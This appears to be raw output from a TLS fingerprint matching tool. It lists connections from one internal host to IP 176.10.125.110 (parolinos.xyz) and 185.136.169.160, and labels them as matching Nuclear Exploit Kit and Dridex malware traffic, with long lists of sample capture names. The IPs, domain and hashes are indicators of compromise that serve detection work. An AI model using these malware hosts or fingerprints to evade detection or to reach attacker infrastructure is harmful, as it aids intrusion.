loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49396 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49397 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, 
nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49215 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49217 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49218 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49219 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49221 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49222 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49223 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49224 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49225 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49227 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49228 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49229 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49230 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49231 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49233 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49234 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49235 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49236 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49238 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49239 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49240 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49241 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49242 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49244 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49245 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49246 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49247 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49250 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49251 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49258 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49259 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49260 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49269 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
